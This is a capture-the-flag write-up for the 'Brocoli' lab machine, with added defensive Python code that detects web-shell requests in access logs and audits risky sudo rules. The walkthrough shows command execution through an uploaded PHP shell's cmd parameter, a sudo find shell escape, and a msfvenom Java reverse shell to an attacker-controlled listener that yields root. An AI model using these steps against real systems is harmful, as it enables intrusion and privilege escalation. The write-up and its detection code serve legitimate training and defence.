LaCaShItA

Intro

We kick off the CTF series with Brocoli from TheHackersLabs.

Enumeration

We start by scanning the ports, as always.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nmap -p- -Pn -sV -sS 192.168.1.111
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-06 06:23 EST
Nmap scan report for TheHackersLabs-Brocoli.home (192.168.1.111)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 08:00:27:06:E0:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.75 seconds

We see that only 22 and 80 are open, so we enumerate port 80 first.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ feroxbuster -u http://192.168.1.111 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.1.111/
 🚩  In-Scope Url          │ 192.168.1.111
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      316c http://192.168.1.111/uploads => http://192.168.1.111/uploads/
200      GET       22l      105w     5952c http://192.168.1.111/icons/ubuntu-logo.png
200      GET      364l      963w    10718c http://192.168.1.111/
200      GET        1l        1w       33c http://192.168.1.111/uploads/informebrocoli.txt
500      GET        0l        0w        0c http://192.168.1.111/uploads/brocoli.php
[####################] - 8s     62290/62290   0s      found:5       errors:0      
[####################] - 8s     62282/62282   8056/s  http://192.168.1.111/ 
[####################] - 0s     62282/62282   2707913/s http://192.168.1.111/uploads/ => Directory listing (add --scan-dir-listings to scan)

We find the /uploads directory.

http://192.168.1.111/uploads/

If we visit brocoli.php, which sits in that directory, it always returns a 500 error.

http://192.168.1.111/uploads/brocoli.php

We fuzz the parameters of brocoli.php to see whether it is hiding something odd :)

┌──(sml㉿ac1d4)-[~/tools]
└─$ ffuf -u http://192.168.1.111/uploads/brocoli.php?FUZZ=id -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -mc 200                                          

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.111/uploads/brocoli.php?FUZZ=id
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

cmd                     [Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 18ms]
:: Progress: [4750/4750] :: Job [1/1] :: 3225 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

We see that it accepts a cmd parameter, so we can run commands through it. Before getting a reverse shell, we look at the "usual" directories and see that /opt holds something...

http://192.168.1.111/uploads/brocoli.php?cmd=cat%20/opt/credenciales.txt
[+] Usuario: brocoli [+] Contraseña: ***
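From the defender's side, the whole chain above (a PHP file served from the upload directory, a wave of parameter names from ffuf, then a parameter whose value decodes to a shell command) is visible in the web server's access log. The following is an added example, not code from the original writeup or from the box author: a small Python detector that parses Apache combined-format log lines and flags requests that match those patterns. The log lines are constructed to mirror the requests in this writeup and are not real logs from the machine; the parameter-name and binary lists are small hand-picked samples.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" log format, modelled on the requests
# made in this writeup (feroxbuster, ffuf and the final cat of /opt/credenciales.txt).
# They are not real logs from the box.
SAMPLE_LOG = """\
192.168.1.114 - - [06/Jan/2026:06:30:01 -0500] "GET /uploads/ HTTP/1.1" 200 1234 "-" "feroxbuster/2.13.1"
192.168.1.114 - - [06/Jan/2026:06:31:10 -0500] "GET /uploads/brocoli.php?user=id HTTP/1.1" 500 0 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.1.114 - - [06/Jan/2026:06:31:10 -0500] "GET /uploads/brocoli.php?cmd=id HTTP/1.1" 200 54 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.1.114 - - [06/Jan/2026:06:35:42 -0500] "GET /uploads/brocoli.php?cmd=cat%20/opt/credenciales.txt HTTP/1.1" 200 61 "-" "Mozilla/5.0"
192.168.1.50 - - [06/Jan/2026:06:40:00 -0500] "GET /index.php?page=about HTTP/1.1" 200 10718 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Parameter names commonly wired straight into system()/shell_exec() (sample list).
SUSPECT_PARAMS = {"cmd", "exec", "command", "execute", "system", "shell", "run"}
# First words that only make sense as a shell command, not as application data (sample list).
SHELL_BINARIES = {"id", "whoami", "cat", "ls", "uname", "nc", "bash", "sh", "wget", "curl", "python3", "perl"}
# Shell metacharacters used to chain or substitute commands.
SHELL_META = re.compile(r"[;|`&]|\$\(")


def classify(target: str) -> list[str]:
    """Return the reasons a request target looks like command execution through a web parameter."""
    reasons = []
    parts = urlsplit(target)
    # A .php file served from the upload directory means uploaded content is executable.
    if parts.path.startswith("/uploads/") and parts.path.endswith(".php"):
        reasons.append("php-in-uploads")
    # parse_qs percent-decodes values, so "cat%20/opt/x" becomes "cat /opt/x".
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in SUSPECT_PARAMS:
            reasons.append(f"suspect-param:{name}")
        for value in values:
            first_word = value.split(maxsplit=1)[0] if value.strip() else ""
            if SHELL_META.search(value) or first_word in SHELL_BINARIES:
                reasons.append(f"shell-like-value:{name}={value}")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse access-log text and return one record per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "status": int(m["status"]),
                "target": m["target"],
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["target"], "->", ", ".join(hit["reasons"]))
```

Running it on the constructed sample flags the three brocoli.php requests and nothing else; the status column separates the fuzzing noise (500) from the parameter that actually worked (200). The server-side fix that removes this whole class of finding is to never let the web server execute scripts from a directory that accepts uploads, for example by turning off the PHP engine for that directory in the Apache virtual host (with mod_php, `php_admin_flag engine off` inside a `<Directory>` block) or by denying access to `.php` files under it with a `<FilesMatch>` rule.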

Brocoli -> Brocolon

With those credentials we connect over ssh. We run sudo -l to see what we are allowed to do.

brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
    (brocolon) NOPASSWD: /usr/bin/find

We see that we can run find as brocolon, so let's move!

brocoli@TheHackersLabs-Brocoli:~$ cd /tmp
brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -u brocolon /usr/bin/find . -exec /bin/sh \; -quit
$ id
uid=1000(brocolon) gid=1000(brocolon) groups=1000(brocolon),4(adm),24(cdrom),30(dip),46(plugdev),101(lxd)

Brocolon -> Root

Now as brocolon, we check again with sudo -l whether we can do anything.

$ sudo -l
Matching Defaults entries for brocolon on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocolon may run the following commands on TheHackersLabs-Brocoli:
    (ALL : ALL) NOPASSWD: /usr/bin/java

OK, we can use java, so on our machine we create a payload to get a reverse shell as root. We run:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.114 LPORT=4444 -f jar -o root.jar

We copy the resulting file (root.jar) to the target machine.

┌──(sml㉿ac1d4)-[~/tools]
└─$ scp root.jar brocoli@192.168.1.111:/tmp
brocoli@192.168.1.111's password: 
root.jar                                                                                                                                      100% 7504     7.1MB/s   00:00 

We set nc listening on our machine:

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nc -nlvp 4444
listening on [any] 4444 ...

On the target machine we launch java so that it runs our reverse shell.

brocolon@TheHackersLabs-Brocoli:/tmp$ sudo -u root /usr/bin/java -jar /tmp/root.jar

We get root.

┌──(sml㉿ac1d4)-[~/ctf/thl/brocoli]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.114] from (UNKNOWN) [192.168.1.111] 53648
id
uid=0(root) gid=0(root) groups=0(root)
hostname
TheHackersLabs-Brocoli
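Both privilege escalations above (brocoli to brocolon through find, brocolon to root through java) come from the same misconfiguration: a sudoers rule that grants NOPASSWD on a binary that can run arbitrary commands for the caller. The following is an added example, not code from the writeup or the box author: a Python audit that parses `sudo -l` output and flags such rules. The two inputs are the `sudo -l` outputs shown in this writeup, pasted verbatim; `SUDO_L_CLEAN` is a hypothetical clean configuration for comparison, and the `RISKY` table is a small hand-picked sample, not a complete catalogue.

```python
from __future__ import annotations

import os
import re

# Constructed input: the two `sudo -l` outputs from this writeup, pasted verbatim.
SUDO_L_BROCOLI = r"""Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
    (brocolon) NOPASSWD: /usr/bin/find
"""

SUDO_L_BROCOLON = r"""Matching Defaults entries for brocolon on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User brocolon may run the following commands on TheHackersLabs-Brocoli:
    (ALL : ALL) NOPASSWD: /usr/bin/java
"""

# Hypothetical clean configuration (not from the box): one fixed admin script, password required.
SUDO_L_CLEAN = """User backup may run the following commands on example-host:
    (root) /usr/local/bin/backup.sh
"""

# Sample of binaries that let the caller run arbitrary commands once granted through sudo.
# Not exhaustive; extend it from your own inventory.
RISKY = {
    "find": "-exec runs any command as the target user",
    "java": "-jar runs any code packaged in a jar as the target user",
    "vim": ":! and :shell escape to a shell",
    "vi": ":! and :shell escape to a shell",
    "less": "! escapes to a shell",
    "more": "! escapes to a shell",
    "man": "the pager's ! escapes to a shell",
    "awk": "system() runs any command",
    "perl": "-e runs arbitrary code",
    "python3": "-c runs arbitrary code",
    "env": "executes whatever program it is given",
    "tar": "--checkpoint-action runs any command",
    "bash": "is a shell",
    "sh": "is a shell",
}

# One rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str) -> list[dict]:
    """Return the command rules listed after the 'may run the following commands' header."""
    entries = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            entries.append({"runas": m["runas"], "tags": tags, "cmd": cmd.strip()})
    return entries


def audit(text: str) -> list[dict]:
    """Flag rules whose command can be turned into an arbitrary command as the runas user."""
    findings = []
    for entry in parse_sudo_l(text):
        binary = os.path.basename(entry["cmd"].split()[0])
        reason = None
        if entry["cmd"] == "ALL":
            reason = "any command is permitted"
        elif binary in RISKY:
            reason = RISKY[binary]
        elif "*" in entry["cmd"]:
            reason = "wildcard in the argument list widens what may be run"
        if reason:
            findings.append({
                "runas": entry["runas"],
                "cmd": entry["cmd"],
                "binary": binary,
                "nopasswd": "NOPASSWD" in entry["tags"],
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for label, text in (("brocoli", SUDO_L_BROCOLI), ("brocolon", SUDO_L_BROCOLON), ("clean", SUDO_L_CLEAN)):
        for f in audit(text):
            pw = "NOPASSWD" if f["nopasswd"] else "password"
            print(f"[{label}] ({f['runas']}) {f['cmd']} [{pw}]: {f['reason']}")
```

On the writeup's two outputs it reports exactly the find and java rules, with the java one marked as runnable as any user; the hypothetical clean configuration produces no finding. The remediation is to drop such rules or replace them with a wrapper script that hard-codes the arguments, so the user gets the one task they need and not the binary's escape hatches. The `id` output earlier also shows brocolon in the `lxd` group, which is another membership worth reviewing during the same audit, since that group confers privileges well beyond a normal user.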

End

Nice machine from Wvverez; the Three Kings have been good to us.